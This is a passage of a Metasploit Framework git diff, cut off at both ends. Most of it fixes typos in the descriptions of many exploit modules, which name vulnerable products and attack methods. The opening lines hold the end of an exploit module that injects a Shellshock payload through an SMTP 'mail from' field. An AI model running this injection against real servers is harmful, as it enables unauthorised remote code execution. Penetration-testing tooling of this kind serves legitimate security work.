|| result[1] > 300 + fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error')) + end + print_status('Sending the payload...') + result = smtp_send("mail from:<() { :; }; " + payload.encoded.gsub!(/\\/, '\\\\\\\\') + ">\r\n") + if result[1] < 200 || result[1] > 300 + fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error')) + end + print_status("Sending RCPT TO #{to}") + result = smtp_send("rcpt to:<#{to}>\r\n") + if result[1] < 200 || result[1] > 300 + fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error')) + end + result = smtp_send("data\r\n") + if result[1] < 200 || result[1] > 354 + fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error')) + end + result = smtp_send("data\r\n\r\nfoo\r\n\r\n.\r\n") + if result[1] < 200 || result[1] > 300 + fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error')) + end + disconnect + end +end diff --git a/modules/exploits/unix/webapp/awstats_migrate_exec.rb b/modules/exploits/unix/webapp/awstats_migrate_exec.rb index fd8eeb8906..8d63607452 100644 --- a/modules/exploits/unix/webapp/awstats_migrate_exec.rb +++ b/modules/exploits/unix/webapp/awstats_migrate_exec.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits an arbitrary command execution vulnerability in the AWStats CGI script. AWStats v6.4 and v6.5 are vulnerable. Perl based payloads are recommended with this module. The vulnerability is only - present when AllowToUpdateStatsFromBrowser is enabled in the AWstats + present when AllowToUpdateStatsFromBrowser is enabled in the AWStats configuration file (non-default). }, 'Author' => [ 'patrick' ], diff --git a/modules/exploits/unix/webapp/barracuda_img_exec.rb b/modules/exploits/unix/webapp/barracuda_img_exec.rb index 917ea4401e..e703cce4c5 100644 --- a/modules/exploits/unix/webapp/barracuda_img_exec.rb +++ b/modules/exploits/unix/webapp/barracuda_img_exec.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Barracuda IMG.PL Remote Command Execution', 'Description' => %q{ This module exploits an arbitrary command execution vulnerability in the - Barracuda Spam Firewall appliance. Versions prior to 3.1.18 are vulnerable. + Barracuda Spam Firewall appliance. Versions prior to 3.1.18 are vulnerable. }, 'Author' => [ 'Nicolas Gregoire ', 'hdm' ], 'License' => MSF_LICENSE, diff --git a/modules/exploits/unix/webapp/havalite_upload_exec.rb b/modules/exploits/unix/webapp/havalite_upload_exec.rb index 2b9ff2ba57..ed306fb329 100644 --- a/modules/exploits/unix/webapp/havalite_upload_exec.rb +++ b/modules/exploits/unix/webapp/havalite_upload_exec.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a - malicious PHP file without authentication, which results in arbitary remote code + malicious PHP file without authentication, which results in arbitrary remote code execution. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/unix/webapp/joomla_comjce_imgmanager.rb b/modules/exploits/unix/webapp/joomla_comjce_imgmanager.rb index a57a85d5b8..22b25196f1 100644 --- a/modules/exploits/unix/webapp/joomla_comjce_imgmanager.rb +++ b/modules/exploits/unix/webapp/joomla_comjce_imgmanager.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Joomla Component JCE File Upload Remote Code Execution', 'Description' => %q{ - This module exploits a vulnerability in the JCE component for Joomla!, which + This module exploits a vulnerability in the JCE component for Joomla!, which could allow an unauthenticated remote attacker to upload arbitrary files, caused by the fails to sufficiently sanitize user-supplied input. Sending specially-crafted HTTP request, a remote attacker could exploit this vulnerability to upload a malicious PHP diff --git a/modules/exploits/unix/webapp/libretto_upload_exec.rb b/modules/exploits/unix/webapp/libretto_upload_exec.rb index 47c325ea10..7133dc93f3 100644 --- a/modules/exploits/unix/webapp/libretto_upload_exec.rb +++ b/modules/exploits/unix/webapp/libretto_upload_exec.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits a file upload vulnerability found in LibrettoCMS 1.1.7, and possibly prior. Attackers can bypass the file extension check and abuse the upload feature in order to upload a malicious PHP file without authentication, which - results in arbitary remote code execution. + results in arbitrary remote code execution. }, 'License' => MSF_LICENSE, 'Author' => diff --git a/modules/exploits/unix/webapp/phpmyadmin_config.rb b/modules/exploits/unix/webapp/phpmyadmin_config.rb index f266206b11..96e979c805 100644 --- a/modules/exploits/unix/webapp/phpmyadmin_config.rb +++ b/modules/exploits/unix/webapp/phpmyadmin_config.rb @@ -12,7 +12,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'PhpMyAdmin Config File Code Injection', 'Description' => %q{ - This module exploits a vulnerability in PhpMyAdmin's setup + This module exploits a vulnerability in phpMyAdmin's setup feature which allows an attacker to inject arbitrary PHP code into a configuration file. The original advisory says the vulnerability is present in phpMyAdmin versions 2.11.x diff --git a/modules/exploits/unix/webapp/spip_connect_exec.rb b/modules/exploits/unix/webapp/spip_connect_exec.rb index e623fdc2cd..b1e395cb60 100644 --- a/modules/exploits/unix/webapp/spip_connect_exec.rb +++ b/modules/exploits/unix/webapp/spip_connect_exec.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a PHP code injection in SPIP. The vulnerability exists in the connect parameter and allows an unauthenticated user to execute arbitrary commands - with web user privileges. Branchs 2.0, 2.1 and 3 are concerned. Vulnerable versions + with web user privileges. Branches 2.0, 2.1 and 3 are concerned. Vulnerable versions are <2.0.21, <2.1.16 and < 3.0.3, but this module works only against branch 2.0 and has been tested successfully with SPIP 2.0.11 and SPIP 2.0.20 with Apache on Ubuntu and Fedora linux distributions. diff --git a/modules/exploits/unix/webapp/tikiwiki_upload_exec.rb b/modules/exploits/unix/webapp/tikiwiki_upload_exec.rb index bf68237aca..214bfdd9fc 100644 --- a/modules/exploits/unix/webapp/tikiwiki_upload_exec.rb +++ b/modules/exploits/unix/webapp/tikiwiki_upload_exec.rb @@ -17,8 +17,8 @@ class MetasploitModule < Msf::Exploit::Remote which could be abused to allow unauthenticated users to execute arbitrary code under the context of the web server user. - The issue comes with one of the 3rd party components. Name of that components is - ELFinder -version 2.0-. This components comes with default example page which + The issue comes with one of the 3rd party components. Name of that component is + ELFinder -version 2.0-. This component comes with default example page which demonstrates file operations such as upload, remove, rename, create directory etc. Default configuration does not force validations such as file extension, content-type etc. Thus, unauthenticated user can upload PHP file. diff --git a/modules/exploits/unix/webapp/tuleap_unserialize_exec.rb b/modules/exploits/unix/webapp/tuleap_unserialize_exec.rb index bdeea042ef..e320e173ec 100644 --- a/modules/exploits/unix/webapp/tuleap_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/tuleap_unserialize_exec.rb @@ -12,7 +12,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Tuleap PHP Unserialize Code Execution', 'Description' => %q{ - This module exploits a PHP object injection vulnerability in Tuelap <= 7.6-4 which could be + This module exploits a PHP object injection vulnerability in Tuleap <= 7.6-4 which could be abused to allow authenticated users to execute arbitrary code with the permissions of the web server. The dangerous unserialize() call exists in the 'src/www/project/register.php' file. The exploit abuses the destructor method from the Jabbex class in order to reach a diff --git a/modules/exploits/unix/webapp/twiki_maketext.rb b/modules/exploits/unix/webapp/twiki_maketext.rb index b3679f5660..09f36d5456 100644 --- a/modules/exploits/unix/webapp/twiki_maketext.rb +++ b/modules/exploits/unix/webapp/twiki_maketext.rb @@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote If USERNAME and PASSWORD aren't provided, anonymous access will be tried. Also, if the 'TwikiPage' option isn't provided, the module will try to create a random - page on the SandBox space. The modules has been tested successfully on + page on the SandBox space. The module has been tested successfully on TWiki 5.1.2 as distributed with the official TWiki-VM-5.1.2-1 virtual machine. }, 'Author' => diff --git a/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb b/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb index c6ae9ec713..b0faae0804 100644 --- a/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb +++ b/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb @@ -20,7 +20,7 @@ class MetasploitModule < Msf::Exploit::Remote be used to bypass the session check as long as at least one session has been created at some point in time. In case there isn't any valid session, the user can provide astGUIcient credentials in order to create one. The results of the injected - command are returned as part of the response from the web server. Affected versions + commands are returned as part of the response from the web server. Affected versions include 2.7RC1, 2.7, and 2.8-403a. Other versions are likely affected as well. The default credentials used by Vicidial are VDCL/donotedit and VDAD/donotedit. }, diff --git a/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb b/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb index 1ec1f68f3b..ebc82466e6 100644 --- a/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb +++ b/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits an arbitrary command execution vulnerability in Webmin 1.580. The vulnerability exists in the /file/show.cgi component and allows an authenticated user, with access to the File Manager Module, to execute arbitrary - commands with root privileges. The module has been tested successfully with Webim + commands with root privileges. The module has been tested successfully with Webmin 1.580 over Ubuntu 10.04. }, 'Author' => [ diff --git a/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb b/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb index fc117add39..fc1e636fcf 100644 --- a/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb +++ b/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb @@ -19,7 +19,7 @@ class MetasploitModule < Msf::Exploit::Remote blogging software plugin known as Google Document Embedder. The vulnerability allows for database credential disclosure via the /libs/pdf.php script. The Google Document Embedder plug-in versions 2.4.6 and below are vulnerable. This exploit only works when the MySQL - server is exposed on a accessible IP and Wordpress has filesystem write access. + server is exposed on an accessible IP and WordPress has filesystem write access. Please note: The admin password may get changed if the exploit does not run to the end. }, diff --git a/modules/exploits/unix/webapp/wp_optimizepress_upload.rb b/modules/exploits/unix/webapp/wp_optimizepress_upload.rb index 4810437411..aac11a89fe 100644 --- a/modules/exploits/unix/webapp/wp_optimizepress_upload.rb +++ b/modules/exploits/unix/webapp/wp_optimizepress_upload.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'WordPress OptimizePress Theme File Upload Vulnerability', 'Description' => %q{ - This module exploits a vulnerability found in the the WordPress theme OptimizePress. The + This module exploits a vulnerability found in the WordPress theme OptimizePress. The vulnerability is due to an insecure file upload on the media-upload.php component, allowing an attacker to upload arbitrary PHP code. This module has been tested successfully on OptimizePress 1.45. diff --git a/modules/exploits/unix/webapp/wp_platform_exec.rb b/modules/exploits/unix/webapp/wp_platform_exec.rb index f4b15a12ec..84fd88e844 100644 --- a/modules/exploits/unix/webapp/wp_platform_exec.rb +++ b/modules/exploits/unix/webapp/wp_platform_exec.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ The WordPress Theme "platform" contains a remote code execution vulnerability through an unchecked admin_init call. The theme includes the uploaded file - from it's temp filename with php's include function. + from its temp filename with php's include function. }, 'Author' => [ diff --git a/modules/exploits/unix/webapp/wp_wptouch_file_upload.rb b/modules/exploits/unix/webapp/wp_wptouch_file_upload.rb index 4ffd012cce..c7f088b016 100644 --- a/modules/exploits/unix/webapp/wp_wptouch_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_wptouch_file_upload.rb @@ -12,14 +12,14 @@ class MetasploitModule < Msf::Exploit::Remote def initialize(info = {}) super(update_info( info, - 'Name' => 'Wordpress WPTouch Authenticated File Upload', + 'Name' => 'WordPress WPTouch Authenticated File Upload', 'Description' => %q{ - The Wordpress WPTouch plugin contains an auhtenticated file upload + The WordPress WPTouch plugin contains an authenticated file upload vulnerability. A wp-nonce (CSRF token) is created on the backend index page and the same token is used on handling ajax file uploads through the plugin. By sending the captured nonce with the upload, we can upload arbitrary files to the upload folder. Because the plugin also - uses it's own file upload mechanism instead of the wordpress api it's + uses its own file upload mechanism instead of the WordPress api it's possible to upload any file type. The user provided does not need special rights, and users with "Contributor" role can be abused. diff --git a/modules/exploits/unix/webapp/zpanel_username_exec.rb b/modules/exploits/unix/webapp/zpanel_username_exec.rb index a7c2c1d256..9f36541072 100644 --- a/modules/exploits/unix/webapp/zpanel_username_exec.rb +++ b/modules/exploits/unix/webapp/zpanel_username_exec.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits a vulnerability found in ZPanel's htpasswd module. When creating .htaccess using the htpasswd module, the username field can be used to inject system commands, which is passed on to a system() function for executing - the system's htpasswd's command. + the system's htpasswd command. Please note: In order to use this module, you must have a valid account to login to ZPanel. An account part of any of the default groups should suffice, such as: diff --git a/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb b/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb index 6ff5dea6be..64ceee4d72 100644 --- a/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb +++ b/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'CA BrightStor ArcServe Media Service Stack Buffer Overflow', 'Description' => %q{ This exploit targets a stack buffer overflow in the MediaSrv RPC service of CA - BrightStor Arcserve. By sending a specially crafted SUNRPC request, an attacker + BrightStor ARCserve. By sending a specially crafted SUNRPC request, an attacker can overflow a stack buffer and execute arbitrary code. }, 'Author' => [ 'toto' ], diff --git a/modules/exploits/windows/browser/adobe_flash_regex_value.rb b/modules/exploits/windows/browser/adobe_flash_regex_value.rb index 90ebd17fac..cd33b6f860 100644 --- a/modules/exploits/windows/browser/adobe_flash_regex_value.rb +++ b/modules/exploits/windows/browser/adobe_flash_regex_value.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a vulnerability found in the ActiveX component of Adobe Flash Player before 11.5.502.149. By supplying a specially crafted swf file - with special regex value, it is possible to trigger an memory corruption, which + with special regex value, it is possible to trigger a memory corruption, which results in remote code execution under the context of the user, as exploited in the wild in February 2013. This module has been tested successfully with Adobe Flash Player 11.5 before 11.5.502.149 on Windows XP SP3 and Windows 7 SP1 before diff --git a/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uninitialized.rb b/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uninitialized.rb index d0b5b556c3..22d9888544 100644 --- a/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uninitialized.rb +++ b/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uninitialized.rb @@ -12,7 +12,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory', 'Description' => %q{ - This module exploits an unintialized memory vulnerability in Adobe Flash Player. The + This module exploits an uninitialized memory vulnerability in Adobe Flash Player. The vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, which fails to initialize allocated memory. When using a correct memory layout this vulnerability leads to a ByteArray object corruption, which can be abused to access and corrupt memory. diff --git a/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb b/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb index 778e71dcdb..b388b83251 100644 --- a/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb +++ b/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb @@ -24,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Remote NOTE: This module uses a similar DEP bypass method to that used within the adobe_libtiff module. This method is unlikely to work across various - Windows versions due a the hardcoded syscall number. + Windows versions due a hardcoded syscall number. }, 'License' => MSF_LICENSE, 'Author' => diff --git a/modules/exploits/windows/browser/aim_goaway.rb b/modules/exploits/windows/browser/aim_goaway.rb index b0640ec8ae..964f71b6e0 100644 --- a/modules/exploits/windows/browser/aim_goaway.rb +++ b/modules/exploits/windows/browser/aim_goaway.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a flaw in the handling of AOL Instant Messenger's 'goaway' URI handler. An attacker can execute - arbitrary code by supplying a overly sized buffer as the + arbitrary code by supplying an overly sized buffer as the 'message' parameter. This issue is known to affect AOL Instant Messenger 5.5. }, diff --git a/modules/exploits/windows/browser/ask_shortformat.rb b/modules/exploits/windows/browser/ask_shortformat.rb index caca2a5cfa..0e4713a70a 100644 --- a/modules/exploits/windows/browser/ask_shortformat.rb +++ b/modules/exploits/windows/browser/ask_shortformat.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Ask.com Toolbar askBar.dll ActiveX Control Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in Ask.com Toolbar 4.0.2.53. - An attacker may be able to excute arbitrary code by sending an overly + An attacker may be able to execute arbitrary code by sending an overly long string to the "ShortFormat()" method in askbar.dll. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb b/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb index a801941580..b8ad0c2019 100644 --- a/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb +++ b/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'BaoFeng Storm mps.dll ActiveX OnBeforeVideoDownload Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow in BaoFeng's Storm media Player ActiveX - control. Verions of mps.dll including 3.9.4.27 and lower are affected. When passing + control. Versions of mps.dll including 3.9.4.27 and lower are affected. When passing an overly long string to the method "OnBeforeVideoDownload" an attacker can execute arbitrary code. }, diff --git a/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb b/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb index b880fb0dae..f0d07ab35c 100644 --- a/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb +++ b/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb @@ -26,7 +26,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module allows remote attackers to place arbitrary files on a users file system by abusing the "DownloadImageFileURL" method in the Black Ice BIImgFrm.ocx ActiveX - Control (BIImgFrm.ocx 12.0.0.0). Code exeuction can be acheived by first uploading the + Control (BIImgFrm.ocx 12.0.0.0). Code execution can be achieved by first uploading the payload to the remote machine, and then upload another mof file, which enables Windows Management Instrumentation service to execute the binary. Please note that this module currently only works for Windows before Vista. Also, a similar issue is reported in diff --git a/modules/exploits/windows/browser/communicrypt_mail_activex.rb b/modules/exploits/windows/browser/communicrypt_mail_activex.rb index 72f477a291..286239a870 100644 --- a/modules/exploits/windows/browser/communicrypt_mail_activex.rb +++ b/modules/exploits/windows/browser/communicrypt_mail_activex.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'CommuniCrypt Mail 1.16 SMTP ActiveX Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in the ANSMTP.dll/AOSMTP.dll - ActiveX Control provided by CommuniCrypt Mail 1.16. By sending a overly + ActiveX Control provided by CommuniCrypt Mail 1.16. By sending an overly long string to the "AddAttachments()" method, an attacker may be able to execute arbitrary code. }, diff --git a/modules/exploits/windows/browser/ea_checkrequirements.rb b/modules/exploits/windows/browser/ea_checkrequirements.rb index 0c07c37584..f893fba392 100644 --- a/modules/exploits/windows/browser/ea_checkrequirements.rb +++ b/modules/exploits/windows/browser/ea_checkrequirements.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in Electronic Arts SnoopyCtrl - ActiveX Control (NPSnpy.dll 1.1.0.36. When sending a overly long + ActiveX Control (NPSnpy.dll 1.1.0.36. When sending an overly long string to the CheckRequirements() method, an attacker may be able to execute arbitrary code. }, diff --git a/modules/exploits/windows/browser/honeywell_tema_exec.rb b/modules/exploits/windows/browser/honeywell_tema_exec.rb index a86cad5fea..ef769faeea 100644 --- a/modules/exploits/windows/browser/honeywell_tema_exec.rb +++ b/modules/exploits/windows/browser/honeywell_tema_exec.rb @@ -13,11 +13,11 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => "Honeywell Tema Remote Installer ActiveX Remote Code Execution", 'Description' => %q{ - This modules exploits a vulnerability found in the Honewell Tema ActiveX Remote + This module exploits a vulnerability found in the Honeywell Tema ActiveX Remote Installer. This ActiveX control can be abused by using the DownloadFromURL() function to install an arbitrary MSI from a remote location without checking source authenticity or user notification. This module has been tested successfully with - the Remote Installer ActiveX installed with HoneyWell EBI R410.1 - TEMA 5.3.0 and + the Remote Installer ActiveX installed with Honeywell EBI R410.1 - TEMA 5.3.0 and Internet Explorer 6, 7 and 8 on Windows XP SP3. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb b/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb index 6b222dd7b9..3e8f5f55b1 100644 --- a/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb +++ b/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb @@ -30,8 +30,8 @@ class MetasploitModule < Msf::Exploit::Remote The vulnerability is found in the "RunAndUploadFile" method where the "OtherFields" parameter with user controlled data - is used to build a "Content-Dispoition" header and attach - contents in a insecure way which allows to overflow a buffer + is used to build a "Content-Disposition" header and attach + contents in an insecure way which allows to overflow a buffer in the stack. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb b/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb index b6de91e82f..1b34a8d3c6 100644 --- a/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb +++ b/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Viscom Image Viewer CP Pro 8.0/Gold 6.0 ActiveX Control', 'Description' => %q{ This module exploits a stack based buffer overflow in the Active control file - ImageViewer2.OCX by passing a overly long argument to an insecure TifMergeMultiFiles() + ImageViewer2.OCX by passing an overly long argument to an insecure TifMergeMultiFiles() method. Exploitation results in code execution with the privileges of the user who browsed to the exploit page. diff --git a/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb b/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb index 9cfc644c40..dfa0e379c3 100644 --- a/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb +++ b/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb @@ -27,9 +27,9 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => "InduSoft Web Studio ISSymbol.ocx InternationalSeparator() Heap Overflow", 'Description' => %q{ This module exploits a heap overflow found in InduSoft Web Studio <= 61.6.00.00 - SP6. The overflow exists in the ISSymbol.ocx, and can be triggered with a long + SP6. The overflow exists in the ISSymbol.ocx, and can be triggered with a long string argument for the InternationalSeparator() method of the ISSymbol control. - This modules uses the msvcr71.dll form the Java JRE6 to bypass ASLR. + This module uses the msvcr71.dll form the Java JRE6 to bypass ASLR. }, 'License' => MSF_LICENSE, 'Author' => diff --git a/modules/exploits/windows/browser/intrust_annotatex_add.rb b/modules/exploits/windows/browser/intrust_annotatex_add.rb index e4c7178b9f..81f047a3b8 100644 --- a/modules/exploits/windows/browser/intrust_annotatex_add.rb +++ b/modules/exploits/windows/browser/intrust_annotatex_add.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Quest InTrust Annotation Objects Uninitialized Pointer', 'Description' => %q{ This module exploits an uninitialized variable vulnerability in the - Annotation Objects ActiveX component. The activeX component loads into memory without + Annotation Objects ActiveX component. The ActiveX component loads into memory without opting into ALSR so this module exploits the vulnerability against windows Vista and Windows 7 targets. A large heap spray is required to fulfill the requirement that EAX points to part of the ROP chain in a heap chunk and the calculated call will hit the diff --git a/modules/exploits/windows/browser/java_ws_double_quote.rb b/modules/exploits/windows/browser/java_ws_double_quote.rb index fb73f00025..2659225f19 100644 --- a/modules/exploits/windows/browser/java_ws_double_quote.rb +++ b/modules/exploits/windows/browser/java_ws_double_quote.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Sun Java Web Start Double Quote Injection', 'Description' => %q{ This module exploits a flaw in the Web Start component of the Sun Java - Runtime Environment. Parameters intial-heap-size and max-heap-size in a JNLP + Runtime Environment. Parameters initial-heap-size and max-heap-size in a JNLP file can contain a double quote which is not properly sanitized when creating the command line for javaw.exe. This allows the injection of the -XXaltjvm option to load a jvm.dll from a remote UNC path into the java process. Thus diff --git a/modules/exploits/windows/browser/java_ws_vmargs.rb b/modules/exploits/windows/browser/java_ws_vmargs.rb index 107a74cc2c..3e34b80dea 100644 --- a/modules/exploits/windows/browser/java_ws_vmargs.rb +++ b/modules/exploits/windows/browser/java_ws_vmargs.rb @@ -25,7 +25,7 @@ class MetasploitModule < Msf::Exploit::Remote allows an attacker to execute arbitrary code in the context of an unsuspecting browser user. - In order for this module to work, it must be ran as root on a server that + In order for this module to work, it must be run as root on a server that does not serve SMB. Additionally, the target host must have the WebClient service (WebDAV Mini-Redirector) enabled. }, diff --git a/modules/exploits/windows/browser/kazaa_altnet_heap.rb b/modules/exploits/windows/browser/kazaa_altnet_heap.rb index b3fb7ebcb9..afaa0ed651 100644 --- a/modules/exploits/windows/browser/kazaa_altnet_heap.rb +++ b/modules/exploits/windows/browser/kazaa_altnet_heap.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a stack buffer overflow in the Altnet Download Manager ActiveX Control (amd4.dll) bundled with Kazaa Media Desktop 3.2.7. - By sending a overly long string to the "Install()" method, an attacker may be + By sending an overly long string to the "Install()" method, an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/browser/logitechvideocall_start.rb b/modules/exploits/windows/browser/logitechvideocall_start.rb index de6766f7fb..6f7c9cd172 100644 --- a/modules/exploits/windows/browser/logitechvideocall_start.rb +++ b/modules/exploits/windows/browser/logitechvideocall_start.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Logitech VideoCall ActiveX Control Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in the Logitech VideoCall ActiveX - Control (wcamxmp.dll 2.0.3470.448). By sending a overly long string to the + Control (wcamxmp.dll 2.0.3470.448). By sending an overly long string to the "Start()" method, an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/browser/macrovision_unsafe.rb b/modules/exploits/windows/browser/macrovision_unsafe.rb index 12895f2825..757f4e051e 100644 --- a/modules/exploits/windows/browser/macrovision_unsafe.rb +++ b/modules/exploits/windows/browser/macrovision_unsafe.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Macrovision InstallShield Update Service ActiveX Unsafe Method', 'Description' => %q{ - This module allows attackers to execute code via an unsafe methods in Macrovision InstallShield 2008. + This module allows attackers to execute code via an unsafe method in Macrovision InstallShield 2008. }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], diff --git a/modules/exploits/windows/browser/mcafee_mvt_exec.rb b/modules/exploits/windows/browser/mcafee_mvt_exec.rb index 131ff4515d..f93e14b3c3 100644 --- a/modules/exploits/windows/browser/mcafee_mvt_exec.rb +++ b/modules/exploits/windows/browser/mcafee_mvt_exec.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => "McAfee Virtual Technician MVTControl 6.3.0.1911 GetObject Vulnerability", 'Description' => %q{ - This modules exploits a vulnerability found in McAfee Virtual Technician's + This module exploits a vulnerability found in McAfee Virtual Technician's MVTControl. This ActiveX control can be abused by using the GetObject() function to load additional unsafe classes such as WScript.Shell, therefore allowing remote code execution under the context of the user. diff --git a/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb b/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb index a639480a73..e82f0e6d6a 100644 --- a/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb +++ b/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'McAfee Visual Trace ActiveX Control Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in the McAfee Visual Trace 3.25 ActiveX - Control (NeoTraceExplorer.dll 1.0.0.1). By sending a overly long string to the + Control (NeoTraceExplorer.dll 1.0.0.1). By sending an overly long string to the "TraceTarget()" method, an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/browser/mozilla_firefox_onreadystatechange.rb b/modules/exploits/windows/browser/mozilla_firefox_onreadystatechange.rb index 2708fc7b9b..d20f53b0db 100644 --- a/modules/exploits/windows/browser/mozilla_firefox_onreadystatechange.rb +++ b/modules/exploits/windows/browser/mozilla_firefox_onreadystatechange.rb @@ -13,8 +13,8 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Firefox onreadystatechange Event DocumentViewerImpl Use After Free', 'Description' => %q{ - This module exploits a vulnerability found on Firefox 17.0.6, specifically an use - after free of a DocumentViewerImpl object, triggered via an specially crafted web + This module exploits a vulnerability found on Firefox 17.0.6, specifically a use + after free of a 